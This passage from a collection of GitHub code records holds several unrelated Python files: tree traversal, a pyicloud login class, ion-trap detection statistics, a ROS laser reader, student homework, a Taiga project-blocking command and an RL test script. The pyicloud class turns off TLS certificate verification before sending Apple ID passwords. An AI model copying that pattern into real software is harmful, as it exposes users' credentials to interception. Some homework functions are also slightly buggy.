print(post)\n\n\n# 3\n# / \\\n# 5 1\n# / \\ / \\\n# 6 2 0 8\n\n\nroot = Node(3)\nroot.left = Node(5)\nroot.right = Node(1)\nroot.right.right = Node(8)\nroot.right.left = Node(0)\nroot.left.right = Node(2)\nroot.left.left = Node(6)\n\nallTraversal(root)\n","repo_name":"glowfi/DS","sub_path":"Programs/7_Trees/4_All_traversal_in_one_pass.py","file_name":"4_All_traversal_in_one_pass.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"36555448713","text":"import time\nimport uuid\nimport hashlib\nimport json\nimport requests\n\nfrom exceptions import PyiCloudFailedLoginException\nfrom services import (\n    FindMyiPhoneServiceManager,\n    CalendarService,\n    UbiquityService,\n    ContactsService,\n)\n\n\nclass PyiCloudService(object):\n    \"\"\"\n    A base authentication class for the iCloud service. Handles the\n    validation and authentication required to access iCloud services.\n\n    Usage:\n        from pyicloud import PyiCloudService\n        pyicloud = PyiCloudService('username@apple.com', 'password')\n        pyicloud.iphone.location()\n    \"\"\"\n    def __init__(self, apple_id, password):\n        self.discovery = None\n        self.client_id = str(uuid.uuid1()).upper()\n        self.user = {'apple_id': apple_id, 'password': password}\n\n        self._home_endpoint = 'https://www.icloud.com'\n        self._setup_endpoint = 'https://p12-setup.icloud.com/setup/ws/1'\n        self._push_endpoint = 'https://p12-pushws.icloud.com'\n\n        self._base_login_url = '%s/login' % self._setup_endpoint\n        self._base_validate_url = '%s/validate' % self._setup_endpoint\n        self._base_system_url = '%s/system/version.json' % self._home_endpoint\n        self._base_webauth_url = '%s/refreshWebAuth' % self._push_endpoint\n\n        self.session = requests.Session()\n        self.session.verify = False\n        self.session.headers.update({\n            'host': 'setup.icloud.com',\n            'origin': self._home_endpoint,\n            'referer': '%s/' % self._home_endpoint,\n            'User-Agent': 'Opera/9.52 (X11; Linux i686; U; en)'\n        })\n\n        self.params = {}\n\n        self.authenticate()\n\n    def refresh_validate(self):\n        \"\"\"\n        Queries the /validate endpoint and fetches two key values we need:\n        1. \"dsInfo\" is a nested object which contains the \"dsid\" integer.\n            This object doesn't exist until *after* the login has taken place,\n            the first request will complain about an X-APPLE-WEBAUTH-TOKEN cookie\n        2. 
\"instance\" is an int which is used to build the \"id\" query string.\n This is, pseudo: sha1(email + \"instance\") to uppercase.\n \"\"\"\n req = self.session.get(self._base_validate_url, params=self.params)\n resp = req.json()\n if 'dsInfo' in resp:\n dsid = resp['dsInfo']['dsid']\n self.params.update({'dsid': dsid})\n instance = resp.get('instance', uuid.uuid4().hex)\n sha = hashlib.sha1(self.user.get('apple_id') + instance)\n self.params.update({'id': sha.hexdigest().upper()})\n\n def authenticate(self):\n \"\"\"\n Handles the full authentication steps, validating,\n authenticating and then validating again.\n \"\"\"\n self.refresh_validate()\n\n data = dict(self.user)\n data.update({'id': self.params['id'], 'extended_login': False})\n req = self.session.post(\n self._base_login_url,\n params=self.params,\n data=json.dumps(data)\n )\n\n if not req.ok:\n msg = 'Invalid email/password combination.'\n raise PyiCloudFailedLoginException(msg)\n\n self.refresh_validate()\n\n self.discovery = req.json()\n self.webservices = self.discovery['webservices']\n\n @property\n def devices(self):\n \"\"\" Return all devices.\"\"\"\n service_root = self.webservices['findme']['url']\n return FindMyiPhoneServiceManager(\n service_root,\n self.session,\n self.params\n )\n\n @property\n def iphone(self):\n return self.devices[0]\n\n @property\n def files(self):\n if not hasattr(self, '_files'):\n service_root = self.webservices['ubiquity']['url']\n self._files = UbiquityService(service_root, self.session, self.params)\n return self._files\n\n @property\n def calendar(self):\n service_root = self.webservices['calendar']['url']\n return CalendarService(service_root, self.session, self.params)\n \n @property\n def contacts(self):\n service_root = self.webservices['contacts']['url']\n return ContactsService(service_root, self.session, self.params)\n\n def __unicode__(self):\n return u'iCloud API: %s' % self.user.get('apple_id')\n\n def __str__(self):\n return unicode(self).encode('ascii', 'ignore')\n\n def __repr__(self):\n return '<%s>' % str(self)\n","repo_name":"angels101/practice-django-framework-api-","sub_path":"env/lib/python3.8/site-packages/pyicloud/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"72566007407","text":"\"\"\"\nTools and methods for detection of fluourescence in the ion trap. The\ndistributions are available as `dark_pmf()` and `light_pmf()`,\nand the measurement estimators are available as `threshold_estimator()` and\n`maximum_likelihood_estimator()`. The biased method of thresholding (i.e. the\nnaive count of how many points are below a threshold) is available as\n`biased_threshold_estimator()`.\n\"\"\"\n\nimport warnings\nimport numpy as np\nfrom scipy.special import gammaincc, erfc, erf, xlogy\n\ndef _integrate(dx, f):\n \"\"\"\n Numerically integrate a function which is closed on both ends.\n \"\"\"\n coefficients = np.ones(f.size, dtype=np.float64)\n coefficients[:3] = [3/8, 7/6, 23/24]\n coefficients[-3:] = [23/24, 7/6, 3/8]\n return dx * coefficients.dot(f)\n\ndef poisson_pmf(mean, ns):\n \"\"\"\n Calculate the probability mass function of the Poisson distribution of a\n given mean for all the possible values of `n` up to `ns - 1` (i.e. 
the\n output array has size `ns`).\n\n Arguments --\n mean: float >= 0 -- The mean of the distribution (also called lambda).\n ns: int > 0 -- The number of `ns` to calculate the distribution for.\n\n Returns --\n np.array(dtype=np.float64, shape=(ns,)) --\n The values of the PMF, such that `poisson_pmf(mean, ns)[n] == pmf[n]`.\n \"\"\"\n out = np.empty(ns, dtype=np.float64)\n out[0] = np.exp(-mean)\n for n in range(1, ns):\n out[n] = out[n - 1] * (mean / n)\n return out\n\ndef dark_pmf(dark_rate, detect_time, ns):\n \"\"\"\n Calculate the probability mass function of the distribution of the count\n rates of a dark ion.\n\n This is just a Poisson distribution of mean `dark_rate * detect_time`.\n\n Arguments --\n dark_rate: float in Hz >= 0 -- The photon emission rate for the dark state.\n detect_time: float in s >= 0 -- The time to detect for.\n ns: int > 0 -- The number of `ns` to calculate the distribution for.\n\n Returns --\n np.array(dtype=np.float64, shape=(ns,)) --\n The values of the PMF, such that `dark_pmf(mean, ns)[n] == pmf[n]`.\n \"\"\"\n return poisson_pmf(dark_rate * detect_time, ns)\n\ndef light_pmf(dark_rate, light_rate, j_mix_decay, detect_time, ns):\n \"\"\"\n Calculate the probability mass function of the distribution of the count\n rates of a light ion.\n\n This is a combination of a Poisson distribution, and the j-mixing tail.\n\n Arguments --\n dark_rate: float in Hz >= 0 -- The photon emission rate of the dark state.\n light_rate: float in Hz >= 0 -- The photon emission rate of the light state.\n j_mix_decay: float in s >= 0 -- The time constant of the j-mixing decay.\n detect_time: float in s >= 0 -- The time to detect for.\n ns: int > 0 -- The number of `ns` to calculate the distribution for.\n\n Returns --\n np.array(dtype=np.float64, shape=(ns,)) --\n The values of the PMF, such that `light_pmf(mean, ns)[n] == pmf[n]`.\n \"\"\"\n z_scale = 1 + 1 / (light_rate * j_mix_decay)\n dark_z = dark_rate * detect_time * z_scale\n light_z = (light_rate + dark_rate) * detect_time * z_scale\n recip_r = light_rate * j_mix_decay / (light_rate * j_mix_decay + 1)\n ratio = recip_r * np.exp(dark_rate*detect_time / (light_rate*j_mix_decay))\\\n / (light_rate * j_mix_decay)\n j_mix = np.empty(ns, dtype=np.float64)\n for n in range(ns):\n j_mix[n] = ratio * (gammaincc(n+1, dark_z) - gammaincc(n+1, light_z))\n ratio *= recip_r\n poisson = poisson_pmf((dark_rate+light_rate) * detect_time, ns)\\\n * np.exp(-detect_time / j_mix_decay)\n return j_mix + poisson\n\ndef _index_ceil(needle, haystack, min=0, max=None):\n \"\"\"\n Find the first index in the `haystack` whose element is greater than or\n equal to `needle`. This saturates at the top, so if `needle` is greater\n than all the values in the `haystack`, then the returned index is\n `haystack.size - 1`.\n \"\"\"\n max = max if max is not None else haystack.shape[0] - 1\n mid = min + (max - min) // 2\n if mid == 0:\n # compare to 0 first to avoid accessing haystack[-1]\n return int(haystack[mid] < needle)\n elif mid == haystack.shape[0] - 2 and haystack[mid] < needle:\n # saturate at top - assume needle always lower than max value in\n # haystack. 
This might not be the case, but is the desired behaviour in\n # the case of truncation errors in the statistical distributions.\n return mid + 1\n elif haystack[mid] >= needle:\n if haystack[mid - 1] < needle:\n return mid\n else:\n return _index_ceil(needle, haystack, min=min, max=mid)\n else:\n return _index_ceil(needle, haystack, min=mid, max=max)\n\ndef sample(distribution, n_samples=1):\n cum_dist = np.cumsum(distribution)\n uniform = np.random.random_sample(n_samples)\n return np.array([_index_ceil(p, cum_dist) for p in uniform],\n dtype=np.int32)\n\ndef histogram(samples, n_max=None, scale=False):\n if n_max is None:\n n_max = int(np.max(samples))\n out = np.zeros(n_max + 1, dtype=np.int32)\n for s in samples:\n out[int(s)] += 1\n return out / samples.shape[0] if scale else out\n\ndef log_likelihood(counts, dark, light):\n light_zeros = light == 0\n dark_zeros = dark == 0\n all_light_impossible = np.any(counts[light_zeros])\n all_dark_impossible = np.any(counts[dark_zeros])\n def f(p):\n # we could have precalculated `diff = dark - light` so that this line is\n # `p * diff + light`, which is one fewer FLOP, but this lends itself to\n # greater FP errors when `p ~ 1`.\n probs = p * dark + (1 - p) * light\n fail = (p == 0 and all_light_impossible)\\\n or (p == 1 and all_dark_impossible)\\\n or np.any(counts[probs == 0])\n return np.sum(xlogy(counts, probs)) if not fail else -np.inf\n return f\n\ndef d_log_likelihood_0(counts, dark, light):\n if np.any(np.logical_and(counts, np.logical_not(light))):\n return np.inf\n mask = np.logical_or(counts, light)\n safes = np.sum(counts[mask] * dark[mask] / light[mask])\n unsafes = np.sum(dark[np.logical_not(mask)])\n return (safes + unsafes) / np.sum(counts) - 1\n\ndef d_log_likelihood_1(counts, dark, light):\n if np.any(np.logical_and(counts, np.logical_not(dark))):\n return -np.inf\n mask = np.logical_or(counts, dark)\n safes = np.sum(counts[mask] * light[mask] / dark[mask])\n unsafes = np.sum(light[np.logical_not(mask)])\n return 1 - (safes + unsafes) / np.sum(counts)\n\ndef _prepare_distributions(dark, light):\n dark = dark if abs(np.sum(dark) - 1) < 1e-8 else dark / np.sum(dark)\n light = light if abs(np.sum(light) - 1) < 1e-8 else light / np.sum(light)\n d_size = 1 + max((np.nonzero(dark)[0][-1], np.nonzero(light)[0][-1]))\n dark, light = [np.pad(x, ((0, max(d_size - x.size, 0)),),\n 'constant', constant_values=0)\n for x in [dark, light]]\n return dark[:d_size], light[:d_size]\n\ndef _crop_counts(counts, dark, light):\n out_of_range = np.sum(counts[dark.size:])\n if out_of_range != 0:\n wmsg = f\"{out_of_range} measurements are outside the range\"\\\n + \" of probabilities for the distributions. These points will\"\\\n + \" be omitted in calculations.\"\n warnings.warn(wmsg)\n size = min((dark.size, counts.size))\n return counts[:size], dark[:size], light[:size]\n\n# This is actually the golden ratio minus 1, but that's what's actually\n# important for the section search (and the ratio of the two sections is the\n# golden ratio).\n_golden_ratio = 0.5 * (np.sqrt(5) - 1)\ndef _bracket_maximum(f):\n \"\"\"\n Initially bracket the maximum, keeping the ratio of points equal. 
Only one\n of the `while` branches should be actually enterable, but while the `while`s\n operate like `if`s, there's no semantic `elwhile` statement.\n \"\"\"\n far, pivot, near = f(0.0), f(_golden_ratio), f(1.0)\n while pivot < far:\n near = pivot\n pivot = f((1 - _golden_ratio) * far[1] + _golden_ratio * pivot[1])\n while pivot < near:\n far = pivot\n pivot = f((1 - _golden_ratio) * pivot[1] + _golden_ratio * near[1])\n return far, pivot, near\n\ndef maximum_likelihood_estimator(dark, light, atol=1e-8):\n dark_0, light_0 = _prepare_distributions(dark, light)\n def p(counts):\n counts, dark, light = _crop_counts(counts, dark_0, light_0)\n f_inner = log_likelihood(counts, dark, light)\n f = lambda p: (f_inner(p), p)\n # clip to the relevant edge if the derivatives point away from [0, 1]\n if d_log_likelihood_0(counts, dark, light) <= 0.0:\n return 0.0\n elif d_log_likelihood_1(counts, dark, light) >= 0.0:\n return 1.0\n far, pivot, near = _bracket_maximum(f)\n while abs(near[1] - far[1]) > atol:\n new = f(far[1] + _golden_ratio * (pivot[1] - far[1]))\n if new > pivot:\n far, pivot, near = far, new, pivot\n else:\n far, pivot, near = near, pivot, new\n return pivot[1]\n return p\n\ndef maximum_likelihood_std(dark, light):\n dark, light = _prepare_distributions(dark, light)\n diff_sq = (dark - light) ** 2\n diff_sq_zeros = diff_sq == 0\n mask = np.logical_not(diff_sq_zeros)\n def std(p, n):\n scalar = np.isscalar(p) and np.isscalar(n)\n p, n = (np.array([p]), np.array([n])) if scalar\\\n else np.broadcast_arrays(p, n)\n # We define `0/0 == 0` here so that including additional bins beyond the\n # necessary ones does not change the Fisher information.\n var = np.zeros(p.shape, dtype=np.float64)\n bin_p = np.outer(p, dark) + np.outer(1 - p, light)\n out = np.all(np.logical_or(diff_sq_zeros, bin_p), axis=1)\n ps, ns = p[out], n[out]\n\n # Scaled variance and standard deviation of the unclipped estimators.\n # Except in one case, the quantities are always used as `2 * var` or\n # `sqrt(2) * std`, so this saves us a few vector operations.\n ma_bin_p = bin_p[np.outer(out, mask)].reshape(np.sum(out), np.sum(mask))\n fisher = np.sum(diff_sq[mask] / ma_bin_p, axis=1)\n var_p = 2 / (ns * fisher)\n std_p = np.sqrt(var_p)\n\n # Precalculate a whole bunch of quantities to save time.\n _1_p = 1 - ps\n g_1_p_sq = np.exp(- _1_p**2 / var_p)\n g_p_sq = np.exp(- ps**2 / var_p)\n recip_std_p = 1.0 / std_p\n erfc_1_p = erfc(_1_p * recip_std_p)\n erf_1_p = erf(_1_p * recip_std_p)\n erf_p = erf(ps * recip_std_p)\n recip_sqrt_pi = 1.0 / np.sqrt(np.pi)\n\n # Expectation of the unclipped estimator (perhaps unnecessary).\n exp_cp = 0.5 * ((g_p_sq - g_1_p_sq) * std_p * recip_sqrt_pi\n + ps * (erf_1_p + erf_p) + erfc_1_p)\n\n exp_p_sq = 0.5 * ((ps**2 + 0.5*var_p) * (erf_1_p + erf_p)\n + std_p * recip_sqrt_pi * (ps * g_p_sq\n - (ps + 1) * g_1_p_sq)\n + erfc_1_p)\n var[out] = exp_p_sq - exp_cp**2\n return np.sqrt(var) if not scalar else np.sqrt(var[0])\n return std\n\ndef biased_threshold_estimator(threshold):\n return lambda counts: np.sum(counts[:threshold]) / np.sum(counts)\n\ndef threshold_integral_std(dark, light, t):\n d = np.sum(dark[t:])\n l = np.sum(light[:t])\n scale = (1 - d - l)**2\n if scale < 1e-10:\n return np.inf\n scale = 0.125 / scale\n return scale * (2 * ((1 - 2*d) * np.sqrt(d*(1-d))\n + (1 - 2*l) * np.sqrt(l*(1-l)))\n + np.arcsin(1 - 2*l) + np.arcsin(1 - 2*d))\n\ndef best_threshold(dark, light):\n return np.argmin([threshold_integral_std(dark, light, t)\n for t in np.arange(min((dark.size, 
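# maximum_likelihood_estimator above narrows its bracket with a golden-section
# search. The same search in a self-contained form, maximising an arbitrary
# concave test function on [0, 1] (tolerance chosen arbitrarily):
GOLDEN = 0.5 * (5 ** 0.5 - 1)  # the golden ratio minus one, ~0.618

def golden_max(f, lo=0.0, hi=1.0, atol=1e-8):
    a = hi - GOLDEN * (hi - lo)  # interior points keep the section ratios
    b = lo + GOLDEN * (hi - lo)
    while hi - lo > atol:
        if f(a) < f(b):
            lo, a = a, b                 # maximum lies in [a, hi]; reuse b as a
            b = lo + GOLDEN * (hi - lo)
        else:
            hi, b = b, a                 # maximum lies in [lo, b]; reuse a as b
            a = hi - GOLDEN * (hi - lo)
    return 0.5 * (lo + hi)

print(round(golden_max(lambda p: -(p - 0.3) ** 2), 6))  # ~0.3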
light.size)))])\n\ndef threshold_std(dark, light, t=None):\n    if t is None:\n        t = best_threshold(dark, light)\n    l = np.sum(light[:t])\n    fidelity = 1 - l - np.sum(dark[t:])\n    if fidelity < 1e-8:\n        # catch negative case too.\n        return lambda p, n: np.full(np.broadcast(p, n).shape, np.inf)\n    scale = 1.0 / fidelity\n    c0, c1, c2 = [l * (1 - l),\n                  fidelity * (1 - 2 * l),\n                  -fidelity * fidelity]\n    return lambda p, n: np.sqrt((c0 + p * (c1 + p * c2)) / (n - 1)) * scale\n\ndef threshold_estimator(dark, light):\n    t = best_threshold(dark, light)\n    l_error = np.sum(light[:t])\n    scale = 1.0 / (1 - l_error - np.sum(dark[t:]))\n    return lambda counts: (np.sum(counts[:t])/np.sum(counts) - l_error) * scale\n","repo_name":"iontrapimperial/penning_analysis","sub_path":"penning/data/detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":12589,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"22485874560","text":"#!/usr/bin/env python3\n\nimport rospy\nfrom sensor_msgs.msg import LaserScan\nimport numpy as np\nfrom points2img import get_image\n\nclass LaserReader():\n    \"\"\"\n    Class that reads and stores the data published on the /scan topic.\n    \n    \"\"\"\n    def __init__(self):\n        rospy.init_node(\"laser_reader\", anonymous=True)\n        self.ranges = []\n        self.intensities = []\n        self.angles = []\n        self.laser_sub = rospy.Subscriber(\"/scan\", LaserScan, self.laser_callback)\n        self.angle_range = 57 * np.pi/180 # per the assignment, the useful range of angles\n        self.resolution = 0.01\n        self.zmax = 4\n\n    def laser_callback(self, info):\n        \"\"\" message fields \"\"\"\n        angle_min = info.angle_min # start angle of the scan [rad]\n        angle_max = info.angle_max # end angle of the scan [rad]\n        angle_increment = info.angle_increment # angular distance between measurements [rad]\n\n        time_increment = info.time_increment # time between measurements [seconds] - if your scanner\n                                             # is moving, this will be used in interpolating position\n                                             # of 3d points\n        scan_time = info.scan_time # time between scans [seconds]\n\n        range_min = info.range_min # minimum range value [m]\n        range_max = info.range_max # maximum range value [m]\n\n        ranges = np.array(info.ranges) # range data [m] (Note: values < range_min or > range_max should be discarded)\n        intensities = info.intensities\n        point_count = len(ranges)\n        \n\n\n        # Select the range and intensity values we care about (within +- 57 degrees)\n        if np.abs(angle_min) > self.angle_range or np.abs(angle_max) > self.angle_range:\n            # assuming the measured angle span is always wider than +-57 degrees:\n            # keep the slice from -57° to +57°\n            min_index = int((np.abs(angle_min)) / angle_increment) - int(self.angle_range / angle_increment)\n            max_index = int((np.abs(angle_min)) / angle_increment) + int(self.angle_range / angle_increment)\n            self.ranges = ranges[min_index:max_index]\n            self.ranges = ranges[np.where(ranges != 4.0, True, False)]\n            self.intensities = intensities[min_index:max_index]\n            self.angles = np.arange(angle_min, angle_max+angle_increment, angle_increment)\n        \n        # print(\"\"\"\n        # ----------------------------------------------------------------------\n        # ---------------------------laser_reader-------------------------------\n        # ----------------------------------------------------------------------\n        # \"\"\")\n        # print(len(self.ranges))\n        # print(self.ranges)\n        \nif __name__ == \"__main__\":\n    LR = LaserReader()\n    
rospy.spin()","repo_name":"Austral-IV/rm-ws","sub_path":"src/lab-3/scripts/laser_reader.py","file_name":"laser_reader.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"19276586019","text":"#Shiv Lakhanpal\n#svl238\n#hw9.py\n\n\n\n\n#Question 1\n\n\ndef max_abs_value(lst):\n print(max(abs(num) for num in lst))\n return\n\n#Question 2\n\ndef find_all(lst, val):\n lst_2 = []\n for index in range(len(lst)):\n if lst[index] == val:\n lst_2.append(index)\n return lst_2\n\n#Question 3\n\ndef reverse1(lst):\n lst1 = lst[::-1]\n return lst1\n\ndef reverse2(lst2):\n new_lst = lst2[::-1]\n return new_lst\n\ndef main():\n\n lst = [1,2,3,4,5,6] #Input any list of numbers in this\n rev = reverse1(lst)\n print(\"After reverse1, lst is:\",lst,\"and the returned list is:\",rev)\n\n lst2 = [1,2,3,4,5,6] #Input any list of numbers in this\n rev_2 = reverse2(lst)\n print(\"After reverse2, lst2 is: \",rev_2)\n\n\n#Question 4\n\n#Encoder\n\ndef run_length_encoder(string):\n\n lst_enc = [] #Empty List\n count = 1\n char_before= \"\"\n \n for char in string: #The current character in the inputed string\n \n if char != char_before:\n \n if char_before:\n \n lst_encoder = (char_before, count) #List that takes the previous character and the number of times in list\n lst_enc.append(lst_encoder) #Adds the mini list to the final list\n \n count = 1\n char_before = char\n \n else:\n count = count + 1\n else:\n lst_encoder = (char, count)\n lst_enc.append(lst_encoder)\n \n return lst_enc\n\n#Decoder\n \ndef run_length_decoder(lst_enc):\n\n new_string = \"\"\n\n for (char,count) in lst_enc:\n\n new_string += char * count #Multiplies number of times char is in list \n \n return new_string\n\n\n\n\n\n \n\n\n \n \n \n\n\n \n \n \n \n\n\n\n\n","repo_name":"ShivLakhanpal/CS-UY-1114","sub_path":"Homework/Homework 9/hw9.py","file_name":"hw9.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"41105602545","text":"from django.core.management.base import BaseCommand\nfrom taiga.projects.choices import BLOCKED_BY_NONPAYMENT\nfrom taiga.projects.models import Project\n\n\nclass Command(BaseCommand):\n help = \"Block user projects\"\n\n def add_arguments(self, parser):\n parser.add_argument(\"owner_usernames\",\n nargs=\"+\",\n help=\"\")\n\n parser.add_argument(\"--is-private\",\n dest=\"is_private\")\n\n parser.add_argument(\"--blocked-code\",\n dest=\"blocked_code\")\n\n def handle(self, *args, **options):\n owner_usernames = options[\"owner_usernames\"]\n projects = Project.objects.filter(owner__username__in=owner_usernames)\n\n is_private = options.get(\"is_private\")\n if is_private is not None:\n is_private = is_private.lower()\n is_private = is_private[0] in [\"t\", \"y\", \"1\"]\n projects = projects.filter(is_private=is_private)\n\n blocked_code = options.get(\"blocked_code\")\n blocked_code = blocked_code if blocked_code is not None else BLOCKED_BY_NONPAYMENT\n projects.update(blocked_code=blocked_code)\n","repo_name":"kaleidos-ventures/taiga-back","sub_path":"taiga/projects/management/commands/block_user_projects.py","file_name":"block_user_projects.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":455,"dataset":"github-code","pt":"2"} +{"seq_id":"2695205437","text":"def main(data:str):\n \"\"\"\n The data is from the file. 
Return data as a list type.\n    Args:\n        data: str\n    Returns:\n        list: return answer\n    \"\"\"\n    r = data.split(',')  # use the parameter rather than the global file contents\n    s=[]\n    for i in r:\n        s+=[int(i)]\n    return s\nf = open(\"txt_file/data01.txt\").read()\nprint(main(f))\n# Read data from file","repo_name":"sarikmag/file_handling_homework","sub_path":"file01.py","file_name":"file01.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"2"}
+{"seq_id":"10678902252","text":"from sys import stdin\r\n\r\n\r\ndef main():\r\n    input = stdin.readline\r\n    _ = int(input())\r\n    a = list(map(int, input().split()))\r\n    _ = int(input())\r\n    b = set(map(int, input().split()))\r\n    x = int(input())\r\n    dp = [False] * (x + 1)\r\n    dp[0] = True\r\n    mini = 0\r\n    while True:\r\n        tmp = x\r\n        pos = []\r\n        for i in range(x, mini - 1, -1):\r\n            if dp[i]:\r\n                pos.append(i)\r\n        if not pos:\r\n            print(\"No\")\r\n            return\r\n        for i in reversed(pos):\r\n            for j in a:\r\n                if i + j <= x and i + j not in b:\r\n                    dp[i + j] = True\r\n                    tmp = min(tmp, i + j)\r\n            dp[i] = False\r\n        if dp[x]:\r\n            print(\"Yes\")\r\n            return\r\n        mini = tmp\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    main()\r\n","repo_name":"yu2799/AtCoder","sub_path":"abc/300/290/289D.py","file_name":"289D.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"37880636958","text":" \n\nfrom direct.actor.Actor import Actor\nfrom panda3d.core import Point3\nfrom direct.interval.IntervalGlobal import Sequence, Func, Wait\n\nimport time\nimport math\n\nfrom core import Config\n\n\nclass Agent(Actor):\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\n\nclass MazeRunnerAgent(Agent):\n\n\tdef __init__(\n\t\t\tself, \n\t\t\tpath, \n\t\t\twalk_path=None, \n\t\t\tstep_size=1, \n\t\t\tstep_duration=1,\n\t\t\trotation_size=1,\n\t\t\trotation_duration=1\n\t\t):\n\t\t\n\t\tif walk_path is None:\n\t\t\twalk_path = path\n\t\tsuper().__init__(path, {'walk': walk_path})\n\t\n\t\tself.__traverser = None\n\n\t\tself.__step_size = step_size\n\t\tself.__step_duration = step_duration\n\t\tself.__rotation_size = rotation_size\n\t\tself.__rotation_duration = rotation_duration\n\t\n\t\tself._initial_setup()\n\t\tself._state = self._get_initial_state()\n\n\tdef _get_initial_state(self):\n\t\treturn {\n\t\t\t\t'forward': False,\n\t\t\t\t'left': False,\n\t\t\t\t'right': False\n\t\t\t\t}\n\n\tdef _get_initial_hpr(self):\n\t\treturn (0,0,0)\n\t\n\tdef _get_initial_scale(self):\n\t\treturn (1, 1, 1)\n\n\tdef _initial_setup(self):\n\t\tself.setHpr(*self._get_initial_hpr())\n\t\tself.setScale(*self._get_initial_scale())\n\n\tdef _get_forward_vector(self):\n\t\th = self.getTrueH()\n\t\treturn Point3(-math.sin(math.radians(h)), math.cos(math.radians(h)), 0)\n\n\tdef set_traverser(self, traverser):\n\t\tif traverser is None:  # guard the argument; the old check compared a bound method against None\n\t\t\treturn\n\t\tself.__traverser = traverser\n\n\tdef setH(self, h):\n\t\tsuper().setH(self._get_initial_hpr()[0] + h)\n\n\tdef getTrueH(self):\n\t\treturn super().getH() - self._get_initial_hpr()[0]\n\n\tdef walk(self):\n\t\tself._state[\"forward\"] = True\n\t\tself.loop(\"walk\")\n\t\tSequence(\n\t\t\tFunc(self.__keep_walking)\n\t\t).start()\n\n\tdef stop_walking(self):\n\t\tself._state[\"forward\"] = False\n\t\tself.stop()\n\n\tdef __traverse(self):\n\t\tif self.parent is None:\n\t\t\treturn\n\t\tself.__traverser.traverse(self.parent)\n\n\tdef __keep_walking(self):\n\t\t\n\t\tif not 
self._state[\"forward\"]:\n\t\t\treturn\n\n\t\tSequence(\n\t\t\t\tself.__walk_step(),\n\t\t\t\tFunc(self.__traverse),\n\t\t\t\tFunc(self.__keep_walking),\n\t\t\t).start()\n\n\n\tdef __walk_step(self):\n\t\tfinal_position = (self._get_forward_vector() * self.__step_size) + self.getPos()\n\t\t#print(\"Final Position: %s\" % (final_position,))\n\t\tpos_interval = self.posInterval(self.__step_duration, final_position, startPos=self.getPos())\n\t\t#print(\"Forward Vector: %s\" % self._get_forward_vector())\n\t\n\t\treturn pos_interval\n\n\tdef turn_left(self):\n\t\tself._state[\"left\"] = True\n\t\tself.__turn(1)\n\t\n\tdef turn_right(self):\n\t\tself._state[\"right\"] = True\n\t\tself.__turn(-1)\n\n\tdef stop_turning(self):\n\t\tself._state[\"right\"] = self._state[\"left\"] = False\n\n\tdef __turn(self, direction):\n\t\t\n\t\tkey = \"left\"\n\t\tif direction == -1:\n\t\t\tkey = \"right\"\n\n\t\tif not self._state[key]:\n\t\t\treturn\n\t\n\t\tSequence(\n\t\t\t\tself.hprInterval(\n\t\t\t\t\t\t\tself.__rotation_duration,\n\t\t\t\t\t\t\tself.__calc_turn_step(direction)\n\t\t\t\t\t\t),\n\t\t\t\tFunc(self.__turn, direction)\n\t\t\t).start()\n\t\n\tdef __calc_turn_step(self, direction):\n\n\t\tfinal_hpr = self.getHpr()\n\t\tprint(\"Initial HPR: %s\" % final_hpr)\n\t\tfinal_hpr[0] = final_hpr[0] + self.__rotation_size * direction\n\t\tprint(\"Final HPR: %s\" %final_hpr)\n\t\treturn final_hpr\n\n\n\n\nclass RhinoAgent(MazeRunnerAgent):\n\n\tdef __init__(self):\n\t\tsuper(RhinoAgent, self).__init__(\n\t\t\t\t\t\t\tConfig.RHINO_AGENT_PATH,\n\t\t\t\t\t\t\tstep_size = 0.3,\n\t\t\t\t\t\t\tstep_duration = 0.0001,\n\t\t\t\t\t\t\trotation_size = 5,\n\t\t\t\t\t\t\trotation_duration = 0.1\n\t\t\t\t\t\t)\n\t\n\n\tdef _get_initial_scale(self):\n\t\treturn (0.0005, 0.0005, 0.0005)\n\n\tdef _get_initial_hpr(self):\n\t\treturn (90, -90, 0)\n\n\tdef _initial_setup(self):\n\t\tsuper()._initial_setup()\n\t\tself.play(\"walk\")\n\t\tself.stop()\n","repo_name":"Aklile-Yilma/Maze-3d-game","sub_path":"core/agent/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"26072440624","text":"import argparse\nimport wandb\nimport toml\nfrom dotmap import DotMap\n\nfrom agents.ppo import *\nfrom agents.awr import *\n\nimport dm_control.suite as suite\nimport gym\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--config\", type=str)\n parser.add_argument(\"--policy\", type=str, default=\"0\")\n args = parser.parse_args()\n\n config = DotMap(toml.load(args.config))\n\n env = None\n if config.Option.benchmark == \"dm_control\":\n env = suite.load(config.Option.env, config.Option.task)\n elif config.Option.benchmark == \"gym\":\n env = gym.make(config.Option.env)\n env.seed(config.Option.seed)\n\n agent = None\n\n if config.Option.algorithm == \"ppo\":\n agent = PPOAgent(env, config)\n elif config.Option.algorithm == \"awr\":\n agent = AWRAgent(env, config)\n\n if config.Option.wandb:\n wandb.init(project=\"custom-rl-algorithms-test\")\n wandb.config.update(config.toDict())\n\n #get N.N parameters\n model_path = config.Model.model_dir + args.policy + \"th_model_a.pth.tar\"\n agent.test_interact(model_path, random=False)\n\nif __name__==\"__main__\":\n 
